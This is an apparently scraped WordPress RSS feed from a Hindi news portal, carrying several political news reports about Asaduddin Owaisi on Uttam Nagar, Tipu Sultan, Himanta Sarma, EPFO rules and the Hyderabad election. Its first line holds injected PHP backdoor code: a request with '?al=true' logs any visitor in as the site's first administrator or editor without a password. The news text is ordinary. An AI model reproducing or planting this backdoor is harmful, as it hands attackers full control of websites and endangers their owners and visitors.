// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Owaisi – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 20 Mar 2026 17:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 उत्तम नगर में तनाव पर ओवैसी का बड़ा बयान: मुसलमान घर छोड़ने को मजबूर, ईद की खुशियां फीकी https://pratyushaashakinayikiran.com/?p=206449 Fri, 20 Mar 2026 17:15:00 +0000 https://pratyushaashakinayikiran.com/?p=206449 नई दिल्ली
दिल्ली के उत्तम नगर में होली पर तरुण की हत्या के बाद उपजे तनाव और ईद से पहले कुछ मुसलमानों के कथित तौर पर इलाके छोड़ने पर सांसद असदुद्दीन ओवैसी ने एक बार फिर केंद्र सरकार पर निशाना साधा है। उन्होंने एक कार्यक्रम के दौरान अपना आक्रोश जाहिर करते हुए कहा कि ये नौबत आ गई है कि देश में 19-20 करोड़ मुसलमान खुशी से ईद भी नहीं मना सकते हैं और इसके लिए उन्हें कोर्ट का सहारा लेना पड़ रहा है।

खबर के मुताबिक ऑल इंडिया मजलिस-ए-इत्तेहादुल मुस्लिमीन (एआईएमआईएम) के प्रमुख असदुद्दीन ओवैसी ने हैदराबाद में एक सभा को संबोधित करते हुए दिल्ली के उत्तम नगर में कायम तनाव को लेकर केंद्र सरकार पर निशाना साधा और पूछा कि यह कानून का कैसा शासन है। उन्होंने अफसोस जाहिर करते हुए कहा कि ईद मनाने के लिए मुसलमानों को कोर्ट जाना पड़ रहा है।

हम रोजेदार हैं, ईद मनाने दो: ओवैसी
ओवैसी ने कहा, 'कई मुसलमान अपना घर छोड़कर चले गए उत्तम नगर से। कोर्ट को जाना पड़ा। दिल्ली हाई कोर्ट को जाकर कहना पड़ा ईद तो मनाने तो सुकून से। हम रोजेदार हैं, ईद तो मनाने दो हमको। ये नौबत आ गई भारत में। मोदी विश्व गुरु की बात करते हैं, 19-20 करोड़ मुसलमान ईद नहीं मना सकते खुशी से। हमको धमकियां दी जा रही हैं। हमको ईद मनाने के लिए कोर्ट जाना पड़ा। बताओ बीजेपी, आरएसएस, मोदी, ये कौन सा कानून का शासन है।' उन्होंने आगे कहा कि अफसोस की बात है कि ईद मनाने के लिए कोर्ट जाना पड़ा और हम कहते हैं कि हम तीसरी सबसे बड़ी अर्थव्यवस्था बन जाएंगे।

हाई कोर्ट में क्या हुआ?
उत्तम नगर में ईद के अवसर पर सांप्रदायिक हिंसा की आशंका को दूर करने के लिए दिल्ली हाई कोर्ट का दरवाजा खटखटाया गया था। अदालत को बताया गया था कि कुछ लोग ईद पर 'खून की होली' की धमकियां दे रहे हैं। मुख्य न्यायाधीश डीके उपाध्याय और न्यायमूर्ति तेजस कारिया की पीठ ने दिल्ली पुलिस को ईद से रामनवमी तक पर्याप्त सुरक्षा व्यवस्था करने को कहा। पीठ ने अधिकारियों को निर्देश दिया कि किसी को भी ऐसी शरारत करने की अनुमति न दी जाए, जिससे कोई 'अप्रिय स्थिति' पैदा होने की आशंका हो।

उत्तम नगर में क्यों है तनाव
दक्षिण-पश्चिमी दिल्ली के उत्तम नगर में होली के दौरान दो पड़ोसी परिवारों के बीच लंबे समय से चले आ रहे विवाद के बाद हुई हिंसा में 26 वर्षीय युवक तरुण की मौत हो गई थी, जिसमें एक नाबालिग को हिरासत में लिया गया है जबकि कई अन्य लोगों को गिरफ्तार किया गया है। तरुण की हत्या के बाद से इलाके में तनाव का माहौल है। भड़काऊ भाषण और पोस्टर लहराते हुए कई वीडियो वायरल हुए थे। भारी जुटान भी हुआ था।

]]>
महाराष्ट्र कांग्रेस अध्यक्ष के विवाद में कूदे ओवैसी, ‘टीपू सुल्तान की अंगूठी पर लिखा था राम’ https://pratyushaashakinayikiran.com/?p=198047 Sun, 15 Feb 2026 09:45:00 +0000 https://pratyushaashakinayikiran.com/?p=198047 नई दिल्ली.

महाराष्ट्र में कांग्रेस इकाई के अध्यक्ष हर्षवर्धन सपकाल ने 18वीं सदी के सुल्तान टीपू सुल्तान की तुलना छत्रपति शिवाजी महाराज से कर दी थी। इसको लेकर विवाद गहराता ही जा रहा है। मुख्यमंत्री देवेंद्र फडणवीस ने सपकाल की टिप्पणी को शर्मनाक करार दिया तो वहीं AIMIM चीफ असदुद्दीन ओवैसी ने बीजेपी पर करारा हमला किया है। उन्होंने कहा कि टीपू सुल्तान हिंदू-मुस्लिम एकता के मिसाल थे।

अंग्रेजों के खिलाफ लड़े टीपू- ओवैसी
ओवैसी ने कहा, 1799 में टीपू सुल्तान की शहादत हुई। अंग्रेजों से लड़कर टीपू की शहादत हुई। टीपू ने जेल में बैठकर तुम्हारे वीर (वीर सावरकर) की तरह अंग्रेजों को लव लेचर नहीं लिखा। टीपू सुल्तान अपने मुल्क को अंग्रेजों से आजाद कराने के लिए शहीद हो गया। अंग्रेजों को टीपू से इतना डर था कि डेढ़ घंटे तक टीपू की लाश पड़ी रही, अंग्रेजों के फौज के घेरों में लाश थी लेकिन डर रहे थे कि शेर उठ गया तो क्या होगा। जाकर देखा तो टीपू का शरीर गर्म था।

अंगूठी पर लिखा था राम
उन्होंने कहा, देवेंद्र फडणवीस साहब, क्या यह बात सच नहीं है कि टीपू के पास से जो अंगूठी निकली उसपर राम लिखा हुआ था। 2014 में बर्सानिया में इसकी नीलामी हुई थी। क्या यह बात झूठ है कि एपीजे अब्दुल कलाम ने अपनी किताब विंग्स ऑफ फायर ने लिखा, कि रॉकेट टेक्नॉलजी के जरिए टीपू के ख्वाबों को पूरा कर रहे हैं। एपीजे अब्दुल कलाम तो आपके लिए ज्यादा आदर्श हैं।

महात्मा गांधी ने भी किया था जिक्र
ओवैसी ने कहा, यह भी ना मानो तो गांधी को तो मानते होगे। उन्होंने अपनी मैगजीन 'यंग एज' में लिखा कि टीपू सुल्तान हिंदू मुस्लिम एकता के समर्थक थे। श्रृंगेरी मठ से फौज ने सोने की मूर्ति उठा ली तब टीपू सुल्तान ने इसका निर्माण करवाया। टीपू सुल्तान बादशाह था। हर बादशाह को सिर्फ अपनी ताकत से मतलब रहता था। लेकिन तथ्यों को गलत तरीके से पेश नहीं कनरा चाहिए। टीपू सुल्तान की फौज के कमांडर अप्पाजी राम थे। उनके सलाहकार कृष्णा राव थे। बीजेपी केवल नफरत पैदा करना चाहती है। भारत की पहली संविधान की किताब में टीपू की फोटो है।

बता दें कि बुलढाणा में सपकाल ने मालेगांव महानगर पालिका की उप-महापौर निहाल अहमद के कार्यालय में टीपू सुल्तान का चित्र लगाए जाने को लेकर हुए विवाद पर बात की, जिसका क्षेत्र के शिवसेना पार्षदों और हिंदू संगठनों ने विरोध किया था। इसके बाद देवेंद्र फडणवीस ने कहा था कि यह तुलना निंदनीय है और कांग्रेस नेता को खुद पर शर्म आनी चाहिए। उन्होंने नागपुर में संवाददाताओं से बातचीत में कहा, "महाराष्ट्र इसे बर्दाश्त नहीं करेगा। सपकाल को छत्रपति शिवाजी महाराज की तुलना टीपू सुल्तान से करने के लिए माफी मांगनी चाहिए। कांग्रेस को इस मामले का संज्ञान लेना चाहिए और उसके सहयोगी दलों को सपकाल की टिप्पणी पर अपना रुख स्पष्ट करना चाहिए।"

]]>
ये तो नरसंहार वाली नफरत है… ओवैसी ने दर्ज कराई शिकायत, सख्त कार्रवाई की मांग पर क्या बोले हिमंता सरमा? https://pratyushaashakinayikiran.com/?p=196636 Mon, 09 Feb 2026 16:55:00 +0000 https://pratyushaashakinayikiran.com/?p=196636 हैदराबाद
ऑल इंडिया मजलिस-ए-इत्तेहादुल मुस्लिमीन (AIMIM) प्रमुख और हैदराबाद से सांसद असदुद्दीन ओवैसी ने असम के मुख्यमंत्री हिमंत बिस्वा सरमा के खिलाफ एक कथित सोशल मीडिया वीडियो को लेकर कड़ा रुख अपनाया है। ओवैसी ने इस मामले में हैदराबाद पुलिस में शिकायत दर्ज कराते हुए उनके खिलाफ आपराधिक कार्रवाई की मांग की है। यह विवाद उस वीडियो को लेकर है, जिसे असम भाजपा ने सोशल मीडिया प्लेटफॉर्म ‘एक्स’ पर साझा किया था और बाद में हटा लिया।

इस वीडियो में कथित तौर पर मुख्यमंत्री सरमा को राइफल से निशाना साधते और गोली चलाते हुए दिखाया गया है। वीडियो के दृश्य में दो लोग दिखाई देते हैं। उनमें से एक ने टोपी पहनी हुई थी और दूसरे ने दाढ़ी रखी थी। इसके कैप्शन में “प्वाइंट-ब्लैंक शॉट” जैसे शब्दों का इस्तेमाल किया गया था। हालांकि, बाद में इस पोस्ट को डिलीट कर दिया गया।

नफरत भरी भाषा अब सामान्य होती जा रही: ओवैसी
ओवैसी ने ‘एक्स’ पर एक पोस्ट में प्रतिक्रिया देते हुए कहा, “दुर्भाग्य से, नरसंहार की मानसिकता वाली नफरत भरी भाषा अब सामान्य होती जा रही है।” ओवैसी ने अपनी शिकायत में सरमा पर 'मुसलमानों की धार्मिक भावनाओं को ठेस पहुंचाने के इरादे से जानबूझकर और दुर्भावनापूर्ण कृत्य करने', दोनों धार्मिक समुदायों के बीच दुश्मनी को बढ़ावा देने और 'राष्ट्रीय एकता के लिए हानिकारक आरोप लगाने' की बात कही है। AIMIM प्रमुख ने यह भी आरोप लगाया कि असम के मुख्यमंत्री पिछले कई वर्षों से सोशल मीडिया, सार्वजनिक मंचों और भाषणों के जरिये मुस्लिम समुदाय के खिलाफ लगातार बयान देते रहे हैं।

ओवैसी की सख्त कार्रवाई की मांग
ओवैसी के अनुसार, हाल के महीनों में यह बयानबाजी और भी उग्र हो गई है, जिससे सांप्रदायिक सौहार्द को गंभीर खतरा पैदा हुआ है। उन्होंने कहा कि 7 फरवरी को पोस्ट किया गया यह वीडियो भले ही एक दिन बाद हटा लिया गया हो, लेकिन अब भी सोशल मीडिया पर वायरल हो रहा है। वीडियो में मुस्लिम समुदाय का स्पष्ट संकेत देने वाले किरदारों को निशाना बनाए जाने का चित्रण किया गया है, जो अत्यंत आपत्तिजनक है। ओवैसी ने मांग की कि इस मामले में कानून के तहत सख़्त कार्रवाई की जाए, ताकि सांप्रदायिक सौहार्द और राष्ट्रीय एकता को नुकसान पहुँचाने वाले ऐसे कृत्यों पर रोक लगाई जा सके।

क्या बोले CM हिमंता बिस्वा सरमा
दूसरी तरफ मुख्यमंत्री हिमंता बिस्वा सरमा ने कहा है कि अहर उनके खिलाफ केस दर्ज हुआ है तो पुलिस गिरफ्तार करे। हालांकि, उन्होंने इस तरह के किसी वीडियो के बारे में जानकारी होने से इनकार किया और कहा कि वह बांग्लादेशी घुसपैठियों के खिलाफ बोलते रहेंगे।

]]>
‘मेरी लोकसभा के थे सभी लोग ’: ओवैसी ने सऊदी अरब हादसे में एक शख्स के बचने की दी जानकारी https://pratyushaashakinayikiran.com/?p=191889 Mon, 17 Nov 2025 09:20:00 +0000 https://pratyushaashakinayikiran.com/?p=191889 नई दिल्ली

सऊदी अरब में भीषण बस हादसे में 42 भारतीयों के मारे जाने की खबर मिली है। इस बीच AIMIM के नेता और हैदराबाद के सांसद असदुद्दीन ओवैसी ने भी इसके बारे में जानकारी दी है। उन्होंने कहा कि मुझे इस हादसे की खबर मिली है। दो ट्रैवल एजेंसियों के माध्यम से मक्का और मदीना की यात्रा पर गए 42 लोग मेरे ही लोकसभा क्षेत्र के थे। उन्होंने कहा कि इस हादसे में एक व्यक्ति के बचने और बाकी सभी के मारे जाने की खबर मिली है। यह हादसा उस वक्त हुआ, जब जायरीनों से भरी बस मक्का से मदीना की ओर जा रही थी। इसी दौरान एक डीजल टैंकर से बस की भिड़ंत हो गई और वह देखते ही देखते जल उठी।

असदुद्दीन ओवैसी ने बताया कि मैंने रियाद स्थित भारतीय दूतावास के डिप्टी चीफ अबू जॉर्ज से बात की है। उन्होंने भरोसा दिया है कि वे पूरी घटना के बारे में जानकारी जुटा रहे हैं और हरसंभव मदद दी जाएगी। इसके अलावा मैंने हैदराबाद स्थित उन दोनों ट्रैवल एजेंसियों से भी बात की है, जिनके माध्यम से ये लोग गए थे। अब मैंने उनकी पूरी डिटेल रियाद स्थित एम्बेसी और विदेश सचिव को दी है। इस हादसे का एक वीडियो भी सोशल मीडिया पर वायरल है, जिसमें दिख रहा है कि बस कैसे धू-धूकर जल रही है। पीएम नरेंद्र मोदी ने इस हादसे पर दुख जताया है।

विदेश मंत्री एस. जयशंकर ने इस घटना में मदद का भरोसा दिया है और कहा कि विदेश मंत्रालय सक्रिय है। पीएम नरेंद्र मोदी ने एक्स पर लिखा, 'मेरी प्रार्थनाएं उन परिवारों के साथ हैं, जिन्होंने अपने प्रिय जनों को खो दिया है। मैं घायलों के तेजी से रिकवर होने की कामना करता हूं। रियाद स्थित हमारे दूतावास और जेद्दाह स्थित कौंसुलेट से पूरी सहायता की जाएगी। हमारे अधिकारी सऊदी अरब की अथॉरिटीज के संपर्क में हैं।' इस घटना के बाद एक कंट्रोल रूम भी स्थापित किया गया है, जहां 24 घंटे संपर्क किया जा सकता है। इसके अलावा हेल्पलाइन नंबर 8002440003 भी जारी किया गया है।

 

]]>
असदुद्दीन ओवैसी ने PF के नए नियमों को बताया ‘अन्याय’, EPFO का पलटवार https://pratyushaashakinayikiran.com/?p=186180 Fri, 17 Oct 2025 13:05:00 +0000 https://pratyushaashakinayikiran.com/?p=186180 नई दिल्ली

EPFO के नए नियमों पर असदुद्दीन ओवैसी भड़क गए और कई तरह के सवाल उठाने लगे। ओवैसी ने अपने ट्वीट में लिखा, "बेरोज़गारी में सरकार का “बचत उत्सव”: पहले बेरोज़गारी के 1-2 महीने में आप पूरा पीएफ निकाल सकते थे। अब सरकार की “दया” से अपने ही पैसे निकालने के लिए 1–3 साल तक इंतज़ार करना होगा। PF का 25% जबरदस्ती 1 साल तक लॉक। मतलब बेरोज़गारी में आपको एक साल का इंतज़ार करना होगा और तब भी आप अपना पैसा पूरा नहीं निकाल सकते।"

ओवैसी ने अपने ट्वीट में आगे लिखा, "EPFO वैसे भी आपके पैसों का मालिक बना हुआ है: ₹54,658 करोड़ पीएफ “अनक्लेम्ड” पड़ा है। 25–35% पीएफ निकासी आवेदन रिजेक्ट हो जाते हैं।"

ओवैसी के इस ट्वीट पर EPFO ने जवाब भी दिया। EPFO ने बताया कि, नौकरी छूटने पर EPF निकालने के लिए 2 महीने की जगह 12 महीने क्यो किया गया?

EPFO ने अपने पोस्ट में लिखा, "नौकरी छूटने के तुरंत बाद लाभार्थी 75% अमाउंट तुरंत निकाल सकता हैं। ⁠12 महीने तक बेरोजगार रहने पे बाकी 25% राशि भी निकाल सकता हैं। 2 महीने में पूर्ण राशि निकालने से 3 महीने के बाद दूसरी नौकरी लग जाने से सर्विस continuous नहीं मानी जाती हैं और वे पेंशन पात्र नहीं होते। क्योंकि पेंशन के लिए 10 वर्ष continuous नौकरी जरूरी है। इन Reforms से EPFO के लाभार्थी को पेंशन हेतु पात्र बनाने में सुविधा होगी।"

 

]]>
अल्लाह देख लेगा: ओवैसी ने नेतन्याहू को बताया दुनिया का सबसे बड़ा गुंडा https://pratyushaashakinayikiran.com/?p=184984 Sat, 11 Oct 2025 16:45:00 +0000 https://pratyushaashakinayikiran.com/?p=184984 हैदराबाद 
हैदराबाद से सांसद और एआईएमआईएम प्रमुख असदुद्दीन ओवैसी ने इजरायली प्रधानमंत्री बेंजामिन नेतन्याहू पर शनिवार को जमकर भड़ास निकाली। उन्होंने इजरायली पीएम को दुनिया का सबसे बड़ा गुंडा करार देते हुए कहा कि उन्हें अल्लाह देख लेगा। ओवैसी ने पीएम मोदी द्वारा इजरायल-गाजा शांति समझौते पर किए गए पोस्ट का जिक्र करते हुए नेतन्याहू पर निशाना साधा।

ओवैसी ने लोगों को संबोधित करते हुए कहा, ''आज पीएम मोदी ने डोनाल्ड ट्रंप को बधाई दी और नेतन्याहू की लीडरशिप की तारीफ की। नेतन्याहू दुनिया का सबसे बड़ा गुंडा है, जिसने 65 हजार लोगों को मार दिया, 20 हजार बच्चे हैं। 12 लाख लोग बेघर हो गए और पीएम उसकी लीडरशिप की तारीफ कर रहे हैं। आखिर क्यों उसकी तारीफ कर रहे हैं? आप तो भारत के प्रधानमंत्री हैं। हम इस बात की निंदा करते हैं जो पीएम मोदी ने नेतन्याहू की लीडरशिप की तारीफ की। अल्लाह देख लेगा नेतन्याहू को इंशाअल्लाह।''

एआईएमआईएम प्रमुख ने आगे कहा, ''पीएम उसकी तारीफ कर रहे हैं, कहीं न कहीं ऊपर जाकर कोई तार मिलता है। ऐसे आदमी (नेतन्याहू) के खिलाफ इंटरनेशनल कोर्ट ने वॉरेंट जारी किया। हिंदुत्व के लोग बोलेंगे ओवैसी क्या बोल रहा। अरे सुनो, कुलभूषण जो पाकिस्तान की जेल गए, उसे सजा-ए-मौत देना चाहते थे तो भारत इंटरनेशनल कोर्ट गया और उसकी सजा रुकवाई।''

ओवैसी ने पीएम मोदी के जिस पोस्ट का जिक्र किया, उसमें प्रधानमंत्री ने लिखा था कि राष्ट्रपति ट्रंप की गाजा शांति योजना के तहत हुई प्रगति पर बधाई देने के लिए अपने मित्र, प्रधानमंत्री नेतन्याहू को फोन किया। हम बंधकों की रिहाई और गाजा के लोगों को मानवीय सहायता बढ़ाने पर हुए समझौते का स्वागत करते हैं। इस बात पर जोर दिया कि दुनिया में कहीं भी किसी भी रूप या स्वरूप में आतंकवाद अस्वीकार्य है। इसके अलावा, पीएम मोदी ने ट्रंप को लेकर भी एक्स पर पोस्ट किया था। उन्होंने लिखा था, ''मैंने अपने मित्र राष्ट्रपति ट्रंप से बात की और ऐतिहासिक गाजा शांति योजना की सफलता पर उन्हें बधाई दी। साथ ही व्यापार वार्ता में हुई अच्छी प्रगति की भी समीक्षा की। आने वाले हफ्तों में निकट संपर्क में रहने पर सहमति बनी।"

 

]]>
कुख्यात आतंकवादी आधिकारिक तौर पर जेल में रहते हुए भी पिता बन गया: ओवैसी https://pratyushaashakinayikiran.com/?p=160681 Sun, 01 Jun 2025 06:56:00 +0000 https://pratyushaashakinayikiran.com/?p=160681 नई दिल्ली

एआईएमआईएम प्रमुख असदुद्दीन ओवैसी ने शनिवार को आतंकवाद को बढ़ावा देने के संदिग्ध रिकॉर्ड को लेकर पाकिस्तान पर तीखा हमला किया और कहा कि आतंकवादियों को पनाह देने की इस्लामाबाद की रणनीति दक्षिण एशिया में अस्थिरता को बढ़ावा देती है। सर्वदलीय संसदीय प्रतिनिधिमंडल के हिस्से के रूप में अल्जीरिया में भारतीय समुदाय को संबोधित करते हुए ओवैसी ने आतंकवाद में इस्लामाबाद की मिलीभगत का एक उदाहरण भी दिया और कहा कि एक आतंकवादी पाकिस्तान में आधिकारिक तौर पर कैद रहते हुए पिता बन गया।

जेल में रहते हुए बाप कैसे बन गया लखवी

ओवैसी ने पाकिस्तान द्वारा जेल में बंद आतंकवादी जकीउर रहमान लखवी के साथ किए जा रहे विशेष व्यवहार की ओर इशारा किया और कहा, “जकीउर रहमान लखवी नामक एक आतंकवादी था – दुनिया का कोई भी देश आतंकवाद के आरोप का सामना कर रहे आतंकवादी को (जेल से बाहर आने) की अनुमति नहीं देगा। लेकिन वह जेल में बैठे-बैठे ही एक बेटे का पिता बन गया। हालांकि, जब पाकिस्तान को ग्रे लिस्ट (FATF की) में डाल दिया गया, तो मुकदमा तुरंत आगे बढ़ गया।”

पाकिस्तान को ग्रे लिस्ट में डालना जरूरी है

असदुद्दीन ओवैसी ने उम्मीद जताई कि अगर पाकिस्तान को वित्तीय कार्रवाई कार्य बल (एफएटीएफ) की ग्रे लिस्ट में वापस डाल दिया जाए, तो भारत में आतंकी घटनाओं में कमी आएगी। ओवैसी ने चेतावनी दी कि यह मुद्दा अब सिर्फ़ क्षेत्रीय चिंता का विषय नहीं रह गया है। उन्होंने कहा, "यह सिर्फ़ दक्षिण एशिया का सवाल नहीं है। हम चौथी सबसे बड़ी अर्थव्यवस्था हैं। क्या होगा? क्या आप चाहते हैं कि यह सब नरसंहार दक्षिण एशिया के अलग-अलग हिस्सों में फैल जाए।" उन्होंने कहा, "आतंकवाद के मुख्य प्रायोजक पाकिस्तान पर नियंत्रण करना विश्व शांति के हित में है। इसे एफएटीएफ ग्रे लिस्ट में वापस लाना होगा।"

जल्द ही पीएम मोदी अल्जीरिया आएंगे-बोले ओवैसी

आतंकवाद की जड़ों के बारे में बोलते हुए उन्होंने आगे कहा, "आतंकवाद दो चीज़ों पर जीवित रहता है: विचारधारा और पैसा। विचारधारा, आप अच्छी तरह जानते हैं, आपने काला दशक देखा है, यहां तक कि दक्षिण अल्जीरिया में भी, आपको अभी भी कुछ समस्याएं हैं। इस मुद्दे पर हम साथ हैं। ओवैसी ने भारत और अल्जीरिया के बीच बढ़ते संबंधों की ओर इशारा करते हुए कहा, "उम्मीद है कि हमारे प्रधानमंत्री बहुत जल्द अल्जीरिया आएंगे। उम्मीद है कि अल्जीरिया के राष्ट्रपति भारत आएंगे। यह सही दिशा में एक बहुत अच्छा कदम होगा।"

 

]]>
भाजपा को हराने के लिए कांग्रेस को सबको साथ लेकर चलना होगा: ओवैसी https://pratyushaashakinayikiran.com/?p=83683 Sun, 13 Oct 2024 09:26:00 +0000 https://pratyushaashakinayikiran.com/?p=83683 हैदराबाद
 ऑल इंडिया मजलिस-ए-इत्तेहादुल मुस्लिमीन (एआईएमआईएम) के अध्यक्ष असदुद्दीन ओवैसी ने कहा कि ‘धर्मनिरपेक्ष’ पार्टियां चुनावों में भारतीय जनता पार्टी (भाजपा)-विरोधी मतों में सेंध लगाने के लिए उन पर (ओवैसी पर) आरोप लगाती थीं, लेकिन हरियाणा में एआईएमआईएम के उम्मीदवारों को न उतारने के बावजूद कांग्रेस कैसे हार गई?

ओवैसी ने कांग्रेस पर परोक्ष रूप से निशाना साधते हुए कहा कि भाजपा को हराने के लिए ‘पुरानी पार्टी’ को सभी को साथ लेकर चलना होगा।

तेलंगाना के विकाराबाद में  एक जनसभा को संबोधित करते हुए उन्होंने कहा, ‘‘उन्होंने (भाजपा) हरियाणा कैसे जीत लिया? मैं वहां नहीं था। वरना वे ‘बी टीम’ कहते… वे वहां हार गए। अब आप ही बताइए, वे किसके कारण हारे?’’

ओवैसी ने कहा, ‘‘मैं पुरानी पार्टी (कांग्रेस) से कहना चाहूंगा कि मेरी बात समझिए, मोदी को हराने के लिए सबको साथ लेकर चलना होगा। आप अकेले कुछ नहीं कर पाओगे।’’

भाजपा ने हरियाणा में सत्ता-विरोधी लहर को मात देते हुए लगातार तीसरी बार शानदार जीत हासिल की और कांग्रेस की वापसी की उम्मीदों पर पानी फेर दिया। हरियाणा में भाजपा ने 90 विधानसभा सीट में से 48 सीट जीतीं, जो सरकार बनाने के लिए 46 के जादुई आंकड़े से कहीं अधिक है।

 

]]>
हैदराबाद में बड़ा उलटफेर, ओवैसी पीछे, बीजेपी की माधवी लता को बढ़त https://pratyushaashakinayikiran.com/?p=37681 Tue, 04 Jun 2024 15:56:00 +0000 https://pratyushaashakinayikiran.com/?p=37681 हैदराबाद

लोकसभा चुनाव में वोटों की गिनती जैसे-जैसे आगे बढ़ रही नई सरकार को लेकर तस्वीर साफ होती दिख रही। इंडिया गठबंधन 230 सीटों आगे चल रही, वहीं केंद्र की सत्ताधारी एनडीए फिर सरकार बनाती नजर आ रही। एनडीए 290 सीटों पर आगे नजर आ रही। बात करें हैदराबाद लोकसभा सीट की तो यहां शुरुआती रूझानों में ओवैसी ने पिछड़ते दिखे। बीजेपी की माधवी लता आगे निकल गई थीं। हालांकि, ओवैसी ने अब 46 हजार से ज्यादा वोटों की बढ़त ले ली है। इस सीट पर पिछले चार लोकसभा चुनाव में एआईएमआईएम मुखिया असदुद्दीन ओवैसी का ही कब्जा रहा है।

हैदराबाद लोकसभा सीट पर ओवैसी या कोई और?
कैंडिडेट    पार्टी    रिजल्ट
असदुद्दीन ओवैसी    AIMIM    आगे
डॉ. माधवी लता    बीजेपी    पीछे
मोहम्मद वलीउल्लाह समीर    कांग्रेस    पीछे
श्रीनिवास यादव गद्दाम    बीआरएस    पीछे
के. एस. कृष्णा    बीएसपी    पीछे

हैदराबाद लोकसभा सीट रहा है AIMIM का गढ़

एआईएमआईएम प्रमुख असदुद्दीन ओवैसी क्या फिर तेलंगाना की हैदराबाद लोकसभा सीट पर बाजी मारेंगे, इस पर सभी की निगाहें हैं। 2019 के चुनाव में लगातार चौथी बार यहां जीतने में सफल रहे थे। ओवैसी इस सीट पर 2004 से जीतते आ रहे। 2019 के लोकसभा चुनाव में बीजेपी के जे भगवंत राव को 2. 82 लाख वोटों के अंतर से हराया था। 2014 में ओवैसी 5,13,868 वोट हासिल कर विजेता बने थे। उन्होंने बीजेपी उम्मीदवार को 2,02,454 वोटों के अंतर से हराया था। हैदराबाद सीट परपंरागत रूप से एआईएमआईएम का गढ़ रहा है, जिसने अल्पसंख्यक बहुल इस निर्वाचन क्षेत्र में 1984 से अपनी पकड़ मजबूत बनाए रखी है। इस सीट पर उनसे पहले पार्टी के पूर्व प्रमुख और असदुद्दीन ओवैसी के पिता सुल्तान सलाहुद्दीन ओवैसी लगातार छह बार निर्वाचित हुए थे।

हैदराबाद लोकसभा सीट पर कितने पर्सेंट हुई वोटिंग

हैदराबाद, तेलंगाना के 17 लोकसभा सीटों में से एक है। ये तेलंगाना और आंध्र प्रदेश की संयुक्त राजधानी भी है। यह क्षेत्र मूसी नदी के किनारे स्थित है। इस लोकसभा चुनाव में तेलंगाना की सभी 17 सीटों पर भी 65.67 फीसदी वोटिंग हुई। हालांकि, राज्य की हाई प्रोफाइल हैदराबाद लोकसभा सीट पर वोटिंग पर्सेंट काफी कम रहा। इस सीट पर राज्य में सबसे कम वोटिंग हुई। इस चुनाव में हैदराबाद लोकसभा सीट पर महज 48.48 फीसदी मतदान हुआ।

हैदराबाद सिटी का इतिहास

ऐतिहासिक रूप से देखें तो हैदराबाद हैदराबाद को निजामों का शहर कहा जाता है। इसकी गिनती देश के विकसित शहरों में भी होती है। हैदराबाद को आईटी सेक्टर का हब भी कहा जाता है। यहां पर दुनिया की सबसे बड़ी फिल्म सिटी माने जाने वाली 'रामोजी फिल्म सिटी' भी मौजूद है। इसी फिल्म सिटी में 'बाहुबली' फिल्म की शूटिंग हुई थी। हैदराबाद शहर अपने लजीज खाने के लिए भी फेमस रहा है। यहां की मशहूर बिरयानी जिसे 'हैदराबादी बिरयानी' के नाम से जाना जाता है, देशभर में चर्चित है।

]]>